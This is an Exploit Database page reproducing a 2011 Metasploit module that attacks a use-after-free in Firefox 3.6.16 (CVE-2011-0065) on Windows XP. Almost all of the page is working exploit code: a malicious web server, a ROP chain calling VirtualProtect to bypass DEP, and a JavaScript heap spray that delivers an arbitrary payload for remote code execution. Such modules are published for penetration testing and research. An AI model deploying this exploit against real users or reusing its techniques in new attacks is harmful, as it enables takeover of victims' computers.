Mozilla Firefox 3.6.16 – OBJECT mChannel Remote Code Execution (DEP Bypass) (Metasploit)

• Exploit Database
• 15 阅读

• 作者： Rh0
  日期： 2011-08-05
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17612/

• require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  	Rank = NormalRanking
  
  	#
  	# This module acts as an HTTP server
  	#
  	include Msf::Exploit::Remote::HttpServer::HTML
  
  	include Msf::Exploit::Remote::BrowserAutopwn
  	autopwn_info({
  		:ua_name => HttpClients::FF,
  		:ua_minver => "3.6.16",
  		:ua_maxver => "3.6.16",
  		:os_name => OperatingSystems::WINDOWS,
  		:javascript => true,
  		:rank => NormalRanking,
  	})
  
  	def initialize(info = {})
  		super(update_info(info,
  			'Name' => 'Mozilla Firefox 3.6.16 mChannel use after free Exploit',
  			'Description'=> %q{
  					This module exploits an use after free vulnerability in Mozilla
  				Firefox 3.6.16. An OBJECT Element mChannel can be freed via the 
  				OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel
  				becomes a dangling pointer and can be reused when setting the OBJECTs 
  				data attribute. (Discovered by regenrecht). This module uses heapspray
  				with a minimal ROP chain to bypass DEP on Windows XP SP3
  			},
  			'License'=> MSF_LICENSE,
  			'Author' =>
  				[
  					'regenrecht', #discovery
  					'Rh0'# wrote metasploit module
  				],
  			'Version'=> '0.0',
  			'References' =>
  				[
  					['CVE','2011-0065'],
  					['OSVDB','72085'],
  					['URL','https://bugzilla.mozilla.org/show_bug.cgi?id=634986'],
  					['URL','http://www.mozilla.org/security/announce/2011/mfsa2011-13.html']
  				],
  			'DefaultOptions' =>
  				{
  					'EXITFUNC' => 'process',
  					'InitialAutoRunScript' => 'migrate -f',
  				},
  			'Payload'=>
  				{
  					'Space'=> 1024,
  					'BadChars' => "",
  				},
  			'Targets'=>
  				[	# worked with 100% reliability
  					[ 'Firefox 3.6.16, Windows XP SP3 (VirtualBox 4)',
  						{
  							'Platform' => 'win',
  							'Arch' => ARCH_X86,
  						}
  					],
  				],
  			'DefaultTarget'=> 0,
  			'DisclosureDate' => 'May 10 2011'
  			))
  	end
  
  	def on_request_uri(cli, request)
  
  		# Re-generate the payload
  		return if ((p = regenerate_payload(cli).encoded) == nil)
  
  		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
  		send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
  
  		# Handle the payload
  		handler(cli)
  	end
  
  	def generate_html(payload)
  		
  		# DEP bypass
  		custom_stack = [
  			0x1052c871,	# mov esp,[ecx] / mov edx,5c86c6ff add [eax],eax / xor eax,eax / pop esi / retN 0x8
  			0x7c801ad4, 	# VirtualProtect 
  			0xbeeff00d,
  			0xbeeff00d,
  			0x7c874413,	# jmp esp
  			0x0c0c0048,	# start address
  			0x00000400,	# size 1024
  			0x00000040,	# Page EXECUTE_READ_WRITE
  			0x0c0c0c00	# old protection
  			].pack("V*")
  			
  		payload_buf = ''
  		payload_buf << custom_stack
  		payload_buf << payload
  		escaped_payload = Rex::Text.to_unescape(payload_buf)
  		
  		custom_js = %Q|
  		
  e = document.getElementById("d");
  e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0)
  fake_obj_addr = unescape("\\x0c%u0c0c")
  
  // taken and modified from adobe_flashplayer_newfunction.rb
  var sc = unescape("#{escaped_payload}")
  var ret_addr = unescape("%u0024%u0c0c")
  while(ret_addr.length+20+8 < 0x100000) {ret_addr += ret_addr}
  var b = ret_addr.substring(0,(0x48-0x24)/2)
  b += sc
  b += ret_addr
  var next = b.substring(0,0x10000/2)
  while(next.length<0x800000) {next += next}
  var again = next.substring(0,0x80000 - (0x1020-0x08)/2)
  array = new Array()
  for (n=0;n<0x1f0;n++){
  	array[n] = again + sc
  }
  
  e.data = ""
  		|
  		
  		return %Q|
  <html>
  <body>
  <object id="d"><object>
  <script type="text/javascript">
  #{custom_js}
  </script></body></html>
  		|
  	end
  
  end